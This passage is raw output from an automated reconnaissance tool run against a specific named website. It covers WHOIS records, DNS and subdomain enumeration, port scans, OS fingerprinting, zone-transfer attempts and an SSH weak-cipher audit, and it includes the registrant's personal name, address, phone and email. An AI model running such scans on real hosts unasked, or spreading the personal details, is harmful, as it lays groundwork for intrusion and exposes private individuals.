2186. Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
2187. Registrar WHOIS Server: whois.nic.ru
2188. Registrar URL: http://nic.ru
2189. Updated Date: 2016-11-28T12:47:05Z
2190. Creation Date: 2015-12-16T07:57:08Z
2191. Registry Expiry Date: 2017-12-16T07:57:08Z
2192. Registrar: Regional Network Information Center, JSC dba RU-CENTER
2193. Registrar IANA ID: 463
2194. Registrar Abuse Contact Email: tld-abuse@nic.ru
2195. Registrar Abuse Contact Phone: +7 (495) 994-46-01
2196. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
2197. Name Server: NS1.EUROGLOBALHOST.COM
2198. Name Server: NS2.EUROGLOBALHOST.COM
2199. DNSSEC: unsigned
2200. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
2201. >>> Last update of whois database: 2017-10-27T07:27:16Z <<<
2202.  
2203. For more information on Whois status codes, please visit https://icann.org/epp
2204.  
2205.  
2206.  
2207. The Registry database contains ONLY .COM, .NET, .EDU domains and
2208. Registrars.
2209.  
2210.  
2211.  
2212.  
2213. G E O I P L O O K U P
2214. =========================
2215.  
2216. [i] IP Address: 91.219.29.120
2217. [i] Country: UA
2218. [i] State: N/A
2219. [i] City: N/A
2220. [i] Latitude: 50.450001
2221. [i] Longitude: 30.523300
2222.  
2223.  
2224.  
2225.  
2226. H T T P H E A D E R S
2227. =======================
2228.  
2229.  
2230. [i] HTTP/1.1 200 OK
2231. [i] Server: nginx/1.10.2
2232. [i] Date: Fri, 27 Oct 2017 07:23:35 GMT
2233. [i] Content-Type: text/html
2234. [i] Connection: close
2235. [i] Accept-Ranges: bytes
2236. [i] Vary: Accept-Encoding,User-Agent
2237.  
2238.  
2239.  
2240.  
2241. D N S L O O K U P
2242. ===================
2243.  
2244. candydollchan.net. 14379 IN A 91.219.29.120
2245. candydollchan.net. 14400 IN NS ns1.euroglobalhost.com.
2246. candydollchan.net. 14400 IN NS ns2.euroglobalhost.com.
2247. candydollchan.net. 14400 IN SOA ns1.euroglobalhost.com. hostmaster.candydollchan.net. 2017031402 14400 3600 1209600 86400
2248. candydollchan.net. 14400 IN MX 10 mail.candydollchan.net.
2249. candydollchan.net. 14400 IN TXT "v=spf1 a mx ip4:80.82.64.110 ~all"
2250.  
2251.  
2252.  
2253.  
2254. S U B N E T C A L C U L A T I O N
2255. ====================================
2256.  
2257. Address = 91.219.29.120
2258. Network = 91.219.29.120 / 32
2259. Netmask = 255.255.255.255
2260. Broadcast = not needed on Point-to-Point links
2261. Wildcard Mask = 0.0.0.0
2262. Hosts Bits = 0
2263. Max. Hosts = 1 (2^0 - 0)
2264. Host Range = { 91.219.29.120 - 91.219.29.120 }
2265.  
2266.  
2267.  
2268. N M A P P O R T S C A N
2269. ============================
2270.  
2271.  
2272. Starting Nmap 7.01 ( https://nmap.org ) at 2017-10-27 07:27 UTC
2273. Nmap scan report for candydollchan.net (91.219.29.120)
2274. Host is up (0.35s latency).
2275. rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
2276. PORT STATE SERVICE VERSION
2277. 21/tcp closed ftp
2278. 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
2279. 23/tcp closed telnet
2280. 25/tcp closed smtp
2281. 80/tcp open http nginx 1.10.2
2282. 110/tcp closed pop3
2283. 143/tcp closed imap
2284. 443/tcp closed https
2285. 445/tcp closed microsoft-ds
2286. 3389/tcp closed ms-wbt-server
2287.  
2288. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2289. Nmap done: 1 IP address (1 host up) scanned in 11.19 seconds
2290.  
2291.  
2292.  
2293. S U B - D O M A I N F I N D E R
2294. ==================================
2295.  
2296.  
2297. [i] Total Subdomains Found : 2
2298.  
2299. [+] Subdomain: candydollchan.net
2300. [-] IP: 91.219.29.120
2301.  
2302. [+] Subdomain: mail.candydollchan.net
2303. [-] IP: 80.82.64.193
2304.  
2305.  
2306.  
2307.  
2308.  
2309. R E V E R S E I P L O O K U P
2310. ==================================
2311.  
2312.  
2313. [i] Total Sites Found On This Server : 0
2314. [*] Performing TLD Brute force Enumeration against candydollchan.net
2315. [*] The operation could take up to: 00:01:07
2316. [*] A candydollchan.biz.af 5.45.75.45
2317. [*] CNAME candydollchan.biz.at free.biz.at
2318. [*] A free.biz.at 216.92.134.29
2319. [*] A candydollchan.co.asia 91.195.240.135
2320. [*] A candydollchan.org.aw 142.4.20.12
2321. [*] A candydollchan.com.ax 185.55.85.123
2322. [*] A candydollchan.org.ax 185.55.85.123
2323. [*] A candydollchan.co.ba 176.9.45.78
2324. [*] A candydollchan.com.ba 195.222.33.180
2325. [*] A candydollchan.com.be 95.173.170.166
2326. [*] A candydollchan.biz.by 71.18.52.2
2327. [*] A candydollchan.biz.bz 199.59.242.150
2328. [*] A candydollchan.net.cc 54.252.89.206
2329. [*] A candydollchan.com.cc 54.252.107.64
2330. [*] A candydollchan.co.cc 175.126.123.219
2331. [*] A candydollchan.org.ch 72.52.4.122
2332. [*] A candydollchan.co.cm 85.25.140.105
2333. [*] A candydollchan.net.cm 85.25.140.105
2334. [*] A candydollchan.biz.cl 185.53.178.8
2335. [*] A candydollchan.co.com 173.192.115.17
2336. [*] A candydollchan.com.com 52.33.196.199
2337. [*] A candydollchan.com 81.171.22.4
2338. [*] A candydollchan.net.com 199.59.242.150
2339. [*] A candydollchan.org.com 23.23.86.44
2340. [*] A candydollchan.biz.cr 72.52.4.122
2341. [*] CNAME candydollchan.biz.cm i.cns.cm
2342. [*] A i.cns.cm 118.184.56.30
2343. [*] A candydollchan.biz.cx 72.52.4.122
2344. [*] A candydollchan.biz.cz 185.53.179.7
2345. [*] A candydollchan.net.cz 80.250.24.177
2346. [*] A candydollchan.com.cz 62.109.128.30
2347. [*] CNAME candydollchan.co.de co.de
2348. [*] A co.de 144.76.162.245
2349. [*] A candydollchan.com.de 50.56.68.37
2350. [*] CNAME candydollchan.org.de www.org.de
2351. [*] A www.org.de 78.47.128.8
2352. [*] A candydollchan.net.eu 78.46.90.98
2353. [*] A candydollchan.org.eu 78.46.90.98
2354. [*] A candydollchan.biz.fi 185.55.85.123
2355. [*] A candydollchan.fm 173.230.131.38
2356. [*] A candydollchan.biz.fm 173.230.131.38
2357. [*] A candydollchan.org.fr 149.202.133.35
2358. [*] A candydollchan.biz.gl 72.52.4.122
2359. [*] CNAME candydollchan.co.gp co.gp
2360. [*] A co.gp 144.76.162.245
2361. [*] A candydollchan.co.hn 208.100.40.203
2362. [*] CNAME candydollchan.net.hr net.hr
2363. [*] A net.hr 192.0.78.24
2364. [*] A net.hr 192.0.78.25
2365. [*] A candydollchan.co.ht 72.52.4.122
2366. [*] CNAME candydollchan.biz.hn parkmydomain.vhostgo.com
2367. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
2368. [*] A westuser.dopa.com 107.186.245.119
2369. [*] A candydollchan.co.jobs 50.17.193.222
2370. [*] A candydollchan.net.jobs 50.19.241.165
2371. [*] A candydollchan.com.jobs 50.19.241.165
2372. [*] A candydollchan.biz.jobs 50.19.241.165
2373. [*] A candydollchan.org.jobs 50.19.241.165
2374. [*] A candydollchan.la 173.230.141.80
2375. [*] A candydollchan.co.la 195.110.124.154
2376. [*] CNAME candydollchan.biz.li 712936.parkingcrew.net
2377. [*] A 712936.parkingcrew.net 185.53.179.29
2378. [*] A candydollchan.biz.lu 195.26.5.2
2379. [*] A candydollchan.biz.ly 64.136.20.39
2380. [*] A candydollchan.biz.md 72.52.4.122
2381. [*] A candydollchan.co.mk 87.76.31.211
2382. [*] A candydollchan.co.mobi 54.225.105.179
2383. [*] A candydollchan.biz.my 202.190.174.44
2384. [*] A candydollchan.net 91.219.29.120
2385. [*] A candydollchan.net.net 52.50.81.210
2386. [*] A candydollchan.co.net 188.166.216.219
2387. [*] A candydollchan.org.net 23.23.86.44
2388. [*] A candydollchan.com.nl 83.98.157.102
2389. [*] A candydollchan.net.nl 83.98.157.102
2390. [*] A candydollchan.co.nr 208.100.40.202
2391. [*] A candydollchan.co.nl 37.97.184.204
2392. [*] CNAME candydollchan.co.nu co.nu
2393. [*] A co.nu 144.76.162.245
2394. [*] A candydollchan.net.nu 199.102.76.78
2395. [*] CNAME candydollchan.com.nu com.nu
2396. [*] A com.nu 144.76.162.245
2397. [*] A candydollchan.org.nu 80.92.84.139
2398. [*] A candydollchan.org 104.18.42.230
2399. [*] A candydollchan.org 104.18.43.230
2400. [*] AAAA candydollchan.org 2400:cb00:2048:1::6812:2ae6
2401. [*] AAAA candydollchan.org 2400:cb00:2048:1::6812:2be6
2402. [*] A candydollchan.com.org 23.23.86.44
2403. [*] CNAME candydollchan.net.org pewtrusts.org
2404. [*] A pewtrusts.org 204.74.99.100
2405. [*] A candydollchan.ph 45.79.222.138
2406. [*] A candydollchan.co.ph 45.79.222.138
2407. [*] A candydollchan.com.ph 45.79.222.138
2408. [*] A candydollchan.net.ph 45.79.222.138
2409. [*] A candydollchan.org.ph 45.79.222.138
2410. [*] A candydollchan.org.pm 208.73.210.217
2411. [*] A candydollchan.org.pm 208.73.211.177
2412. [*] A candydollchan.org.pm 208.73.211.165
2413. [*] A candydollchan.org.pm 208.73.210.202
2414. [*] A candydollchan.co.pl 212.91.6.55
2415. [*] A candydollchan.co.ps 66.96.132.56
2416. [*] CNAME candydollchan.biz.ps biz.ps
2417. [*] A biz.ps 144.76.162.245
2418. [*] A candydollchan.co.pt 194.107.127.52
2419. [*] A candydollchan.pw 141.8.226.58
2420. [*] A candydollchan.co.pw 141.8.226.59
2421. [*] A candydollchan.net.pw 141.8.226.59
2422. [*] A candydollchan.biz.pw 141.8.226.59
2423. [*] A candydollchan.org.pw 141.8.226.59
2424. [*] A candydollchan.net.ro 69.64.52.127
2425. [*] CNAME candydollchan.co.ro now.co.ro
2426. [*] A now.co.ro 185.27.255.9
2427. [*] A candydollchan.org.re 217.70.184.38
2428. [*] A candydollchan.com.ru 178.210.89.119
2429. [*] A candydollchan.biz.sb 72.52.4.122
2430. [*] A candydollchan.biz.se 185.53.179.6
2431. [*] CNAME candydollchan.net.se 773147.parkingcrew.net
2432. [*] A 773147.parkingcrew.net 185.53.179.29
2433. [*] A candydollchan.co.sl 91.195.240.135
2434. [*] A candydollchan.com.sr 143.95.106.249
2435. [*] A candydollchan.co.su 72.52.4.122
2436. [*] A candydollchan.biz.st 91.121.28.115
2437. [*] A candydollchan.biz.tc 64.136.20.39
2438. [*] A candydollchan.biz.tf 85.236.153.18
2439. [*] A candydollchan.net.tf 188.40.117.12
2440. [*] A candydollchan.net.tf 188.40.70.29
2441. [*] A candydollchan.net.tf 188.40.70.27
2442. [*] A candydollchan.co.tl 208.100.40.202
2443. [*] A candydollchan.co.to 175.118.124.44
2444. [*] A candydollchan.co.tv 31.186.25.163
2445. [*] A candydollchan.biz.tv 72.52.4.122
2446. [*] A candydollchan.org.tv 72.52.4.122
2447. [*] CNAME candydollchan.biz.uz biz.uz
2448. [*] A biz.uz 144.76.162.245
2449. [*] A candydollchan.vg 88.198.29.97
2450. [*] A candydollchan.co.vg 88.198.29.97
2451. [*] A candydollchan.com.vg 88.198.29.97
2452. [*] A candydollchan.net.vg 166.62.28.147
2453. [*] A candydollchan.biz.vg 89.31.143.20
2454. [*] A candydollchan.ws 64.70.19.203
2455. [*] A candydollchan.com.ws 202.4.48.211
2456. [*] A candydollchan.net.ws 202.4.48.211
2457. [*] A candydollchan.biz.ws 184.168.221.104
2458. [*] A candydollchan.org.ws 202.4.48.211
2459. inetnum: 91.219.28.0 - 91.219.31.255
2460. netname: UKRSERVERS-NET
2461. country: UA
2462. org: ORG-FKAV1-RIPE
2463. admin-c: KCH78-RIPE
2464. tech-c: KCH78-RIPE
2465. status: ASSIGNED PI
2466. mnt-by: RIPE-NCC-END-MNT
2467. mnt-by: UADOMEN-MNT
2468. mnt-routes: UADOMEN-MNT
2469. mnt-routes: DATAHARBOUR-MNT
2470. mnt-domains: UADOMEN-MNT
2471. created: 2010-09-06T11:31:55Z
2472. last-modified: 2017-01-31T08:48:17Z
2473. source: RIPE
2474. sponsoring-org: ORG-SL452-RIPE
2475.  
2476. organisation: ORG-FKAV1-RIPE
2477. org-name: FLP Kochenov Aleksej Vladislavovich
2478. org-type: OTHER
2479. address: 38, Danilevskogo Str., Kharkov
2480. address: Kharkov, Ukraine
2481. phone: +38.0443039163
2482. fax-no: +38.0577209170
2483. abuse-c: AR18187-RIPE
2484. admin-c: KCH78-RIPE
2485. tech-c: KCH78-RIPE
2486. mnt-ref: UADOMEN-MNT
2487. mnt-ref: SINARO
2488. abuse-mailbox: hostmaster@uadomen.com
2489. mnt-by: UADOMEN-MNT
2490. created: 2009-02-13T16:33:48Z
2491. last-modified: 2017-01-20T20:50:23Z
2492. source: RIPE # Filtered
2493.  
2494. person: Aleksej V. Kochenov
2495. address: 8, Donvar Zapolskogo Str.,
2496. address: Kiev, Ukraine
2497. phone: +38.0443039163
2498. fax-no: +38.0577209170
2499. nic-hdl: KCH78-RIPE
2500. abuse-mailbox: support@uadomen.com
2501. mnt-by: UADOMEN-MNT
2502. created: 2009-02-13T13:13:18Z
2503. last-modified: 2015-05-28T18:26:23Z
2504. source: RIPE # Filtered
2505.  
2506. % Information related to '91.219.29.0/24AS3254'
2507.  
2508. route: 91.219.29.0/24
2509. descr: AGGREGATE BLOCK FOR LuckyNet Datacenter
2510. origin: AS3254
2511. mnt-by: AS3254-MNT
2512. created: 2011-03-23T09:12:24Z
2513. last-modified: 2011-03-23T09:12:24Z
2514. source: RIPE
2515.  
2516. % This query was served by the RIPE Database Query Service version 1.90 (BLAARKOP)
2517. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
2518. Server: 192.168.1.254
2519. Address: 192.168.1.254#53
2520.  
2521. Non-authoritative answer:
2522. Name: candydollchan.net
2523. Address: 91.219.29.120
2524.  
2525. candydollchan.net has address 91.219.29.120
2526. candydollchan.net mail is handled by 10 mail.candydollchan.net.
2527.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
2528.  
2529. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
2530.  
2531. [+] Target is candydollchan.net
2532. [+] Loading modules.
2533. [+] Following modules are loaded:
2534. [x] [1] ping:icmp_ping - ICMP echo discovery module
2535. [x] [2] ping:tcp_ping - TCP-based ping discovery module
2536. [x] [3] ping:udp_ping - UDP-based ping discovery module
2537. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
2538. [x] [5] infogather:portscan - TCP and UDP PortScanner
2539. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
2540. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
2541. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
2542. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
2543. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
2544. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
2545. [x] [12] fingerprint:smb - SMB fingerprinting module
2546. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
2547. [+] 13 modules registered
2548. [+] Initializing scan engine
2549. [+] Running scan engine
2550. [-] ping:tcp_ping module: no closed/open TCP ports known on 91.219.29.120. Module test failed
2551. [-] ping:udp_ping module: no closed/open UDP ports known on 91.219.29.120. Module test failed
2552. [-] No distance calculation. 91.219.29.120 appears to be dead or no ports known
2553. [+] Host: 91.219.29.120 is up (Guess probability: 50%)
2554. [+] Target: 91.219.29.120 is alive. Round-Trip Time: 0.49164 sec
2555. [+] Selected safe Round-Trip Time value is: 0.98327 sec
2556. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
2557. [-] fingerprint:smb need either TCP port 139 or 445 to run
2558. [+] Primary guess:
2559. [+] Host 91.219.29.120 Running OS: (Guess probability: 100%)
2560. [+] Other guesses:
2561. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2562. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2563. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2564. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2565. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2566. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2567. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2568. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2569. [+] Host 91.219.29.120 Running OS: À2Î$fU (Guess probability: 95%)
2570. [+] Cleaning up scan engine
2571. [+] Modules deinitialized
2572. [+] Execution completed.
2573.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
2574. Domain Name: CANDYDOLLCHAN.NET
2575. Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
2576. Registrar WHOIS Server: whois.nic.ru
2577. Registrar URL: http://nic.ru
2578. Updated Date: 2016-11-28T12:47:05Z
2579. Creation Date: 2015-12-16T07:57:08Z
2580. Registry Expiry Date: 2017-12-16T07:57:08Z
2581. Registrar: Regional Network Information Center, JSC dba RU-CENTER
2582. Registrar IANA ID: 463
2583. Registrar Abuse Contact Email: tld-abuse@nic.ru
2584. Registrar Abuse Contact Phone: +7 (495) 994-46-01
2585. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
2586. Name Server: NS1.EUROGLOBALHOST.COM
2587. Name Server: NS2.EUROGLOBALHOST.COM
2588. Domain Name: CANDYDOLLCHAN.NET
2589. Registry Domain ID: 1987658926_DOMAIN_NET-VRSN
2590. Registrar WHOIS Server: whois.nic.ru
2591. Registrar URL: http://www.nic.ru
2592. Creation Date: 2015-12-16T07:57:08Z
2593. Registrar Registration Expiration Date: 2017-12-15T21:00:00Z
2594. Registrar: Regional Network Information Center, JSC dba RU-CENTER
2595. Registrar IANA ID: 463
2596. Registrar Abuse Contact Email: tld-abuse@nic.ru
2597. Registrar Abuse Contact Phone: +7.4959944601
2598. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
2599. Registry Registrant ID:
2600. Registrant Name: Chaplenko Yuri
2601. Registrant Organization: Chaplenko Yuri
2602. Registrant Street: Karadzhicha st. 13-35
2603. Registrant City: Lvov
2604. Registrant State/Province: Lvovskaya
2605. Registrant Postal Code: 79054
2606. Registrant Country: UA
2607. Registrant Phone: +380.672306256
2608. Registrant Phone Ext:
2609. Registrant Email: ychaplenko@inbox.ru
2610. Registry Admin ID:
2611. Admin Name: Chaplenko Yuri
2612. Admin Organization: Chaplenko Yuri
2613. Admin Street: Karadzhicha st. 13-35
2614. Admin City: Lvov
2615. Admin State/Province: Lvovskaya
2616. Admin Postal Code: 79054
2617. Admin Country: UA
2618. Admin Phone: +380.672306256
2619. Admin Phone Ext:
2620. Admin Email: ychaplenko@inbox.ru
2621. Registry Tech ID:
2622. Tech Name: Chaplenko Yuri
2623. Tech Organization: Chaplenko Yuri
2624. Tech Street: Karadzhicha st. 13-35
2625. Tech City: Lvov
2626. Tech State/Province: Lvovskaya
2627. Tech Postal Code: 79054
2628. Tech Country: UA
2629. Tech Phone: +380.672306256
2630. Tech Phone Ext:
2631. Tech Email: ychaplenko@inbox.ru
2632. Name Server: ns1.euroglobalhost.com
2633. Name Server: ns2.euroglobalhost.com
2634. DNSSEC: unsigned
2635. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
2636. For more information on Whois status codes, please visit: https://icann.org/epp
2637. >>> Last update of WHOIS database: 2017.10.27T07:26:29Z <<<
2638.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
2639.  
2640. [+] Hosts found in search engines:
2641. ------------------------------------
2642. [-] Resolving hostnames IPs...
2643. 91.219.29.120:www.candydollchan.net
2644.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
2645.  
2646. ; <<>> DiG 9.10.3-P4-Debian <<>> -x candydollchan.net
2647. ;; global options: +cmd
2648. ;; Got answer:
2649. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26499
2650. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
2651.  
2652. ;; OPT PSEUDOSECTION:
2653. ; EDNS: version: 0, flags:; udp: 4096
2654. ;; QUESTION SECTION:
2655. ;net.candydollchan.in-addr.arpa. IN PTR
2656.  
2657. ;; AUTHORITY SECTION:
2658. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102402 1800 900 604800 3600
2659.  
2660. ;; Query time: 38 msec
2661. ;; SERVER: 192.168.1.254#53(192.168.1.254)
2662. ;; WHEN: Fri Oct 27 03:26:53 EDT 2017
2663. ;; MSG SIZE rcvd: 127
2664.  
2665. dnsenum VERSION:1.2.4
2666. 
2667. ----- candydollchan.net -----
2668. 
2669.  
2670. Host's addresses:
2671. __________________
2672.  
2673. candydollchan.net. 14203 IN A 91.219.29.120
2674. 
2675.  
2676. Name Servers:
2677. ______________
2678.  
2679. 
2680.  
2681. Mail (MX) Servers:
2682. ___________________
2683.  
2684. mail.candydollchan.net. 14400 IN A 80.82.64.193
2685. 
2686.  
2687. Trying Zone Transfers and getting Bind Versions:
2688. _________________________________________________
2689.  
2690. 
2691. Trying Zone Transfer for candydollchan.net on ns2.euroglobalhost.com ...
2692.  
2693. Trying Zone Transfer for candydollchan.net on ns1.euroglobalhost.com ...
2694.  
2695. brute force file not specified, bay.
2696.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
2697. 
2698. ____ _ _ _ _ _____
2699. / ___| _ _| |__ | (_)___| |_|___ / _ __
2700. \___ \| | | | '_ \| | / __| __| |_ \| '__|
2701. ___) | |_| | |_) | | \__ \ |_ ___) | |
2702. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
2703.  
2704. # Coded By Ahmed Aboul-Ela - @aboul3la
2705.  
2706. [-] Enumerating subdomains now for candydollchan.net
2707. [-] verbosity is enabled, will show the subdomains results in realtime
2708. [-] Searching now in Baidu..
2709. [-] Searching now in Yahoo..
2710. [-] Searching now in Google..
2711. [-] Searching now in Bing..
2712. [-] Searching now in Ask..
2713. [-] Searching now in Netcraft..
2714. [-] Searching now in DNSdumpster..
2715. [-] Searching now in Virustotal..
2716. [-] Searching now in ThreatCrowd..
2717. [-] Searching now in SSL Certificates..
2718. [-] Searching now in PassiveDNS..
2719. Virustotal: mail.candydollchan.net
2720. Virustotal: www.candydollchan.net
2721. DNSdumpster: mail.candydollchan.net
2722. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-candydollchan.net.txt
2723. [-] Total Unique Subdomains Found: 2
2724. www.candydollchan.net
2725. mail.candydollchan.net
2726.  
2727.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
2728.  ║ ╠╩╝ ║ ╚═╗╠═╣
2729.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
2730.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
2731. 
2732.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-candydollchan.net-full.txt
2733. 
2734.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
2735.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
2736.  
2737.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
2738. PING candydollchan.net (91.219.29.120) 56(84) bytes of data.
2739. 64 bytes from 120.29.219.91.colo.ukrservers.com (91.219.29.120): icmp_seq=1 ttl=54 time=151 ms
2740.  
2741. --- candydollchan.net ping statistics ---
2742. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
2743. rtt min/avg/max/mdev = 151.189/151.189/151.189/0.000 ms
2744.  
2745.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
2746.  
2747. Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 03:27 EDT
2748. Nmap scan report for candydollchan.net (91.219.29.120)
2749. Host is up (0.27s latency).
2750. rDNS record for 91.219.29.120: 120.29.219.91.colo.ukrservers.com
2751. Not shown: 34 closed ports, 13 filtered ports
2752. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2753. PORT STATE SERVICE
2754. 22/tcp open ssh
2755. 80/tcp open http
2756.  
2757. Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds
2758.  
2759.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
2760.  + -- --=[Port 21 closed... skipping.
2761.  + -- --=[Port 22 opened... running tests...
2762. # general
2763. (gen) banner: SSH-2.0-OpenSSH_6.6.1
2764. (gen) software: OpenSSH 6.6.1
2765. (gen) compatibility: OpenSSH 6.5-6.6, Dropbear SSH 2013.62+ (some functionality from 0.52)
2766. (gen) compression: enabled (zlib@openssh.com)
2767.  
2768. # key exchange algorithms
2769. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
2770. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
2771. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2772. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
2773. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2774. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
2775. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2776. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
2777. `- [info] available since OpenSSH 4.4
2778. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2779. `- [warn] using weak hashing algorithm
2780. `- [info] available since OpenSSH 2.3.0
2781. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
2782. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
2783. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2784. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
2785. `- [warn] using small 1024-bit modulus
2786. `- [warn] using weak hashing algorithm
2787. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2788.  
2789. # host-key algorithms
2790. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
2791. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
2792. `- [warn] using weak random number generator could reveal the key
2793. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
2794. (key) ssh-ed25519 -- [info] available since OpenSSH 6.5
2795.  
2796. # encryption algorithms (ciphers)
2797. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2798. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
2799. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
2800. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2801. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2802. `- [warn] using weak cipher
2803. `- [info] available since OpenSSH 4.2
2804. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2805. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2806. `- [warn] using weak cipher
2807. `- [info] available since OpenSSH 4.2
2808. (enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
2809. (enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
2810. (enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
2811. `- [info] default cipher since OpenSSH 6.9.
2812. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2813. `- [warn] using weak cipher mode
2814. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
2815. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2816. `- [warn] using weak cipher
2817. `- [warn] using weak cipher mode
2818. `- [warn] using small 64-bit block size
2819. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2820. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2821. `- [fail] disabled since Dropbear SSH 0.53
2822. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2823. `- [warn] using weak cipher mode
2824. `- [warn] using small 64-bit block size
2825. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
2826. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2827. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2828. `- [warn] using weak cipher mode
2829. `- [warn] using small 64-bit block size
2830. `- [info] available since OpenSSH 2.1.0
2831. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2832. `- [warn] using weak cipher mode
2833. `- [info] available since OpenSSH 2.3.0
2834. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2835. `- [warn] using weak cipher mode
2836. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
2837. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2838. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2839. `- [warn] using weak cipher
2840. `- [info] available since OpenSSH 2.1.0
2841. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
2842. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
2843. `- [warn] using weak cipher mode
2844. `- [info] available since OpenSSH 2.3.0
2845.  
2846. # message authentication code algorithms
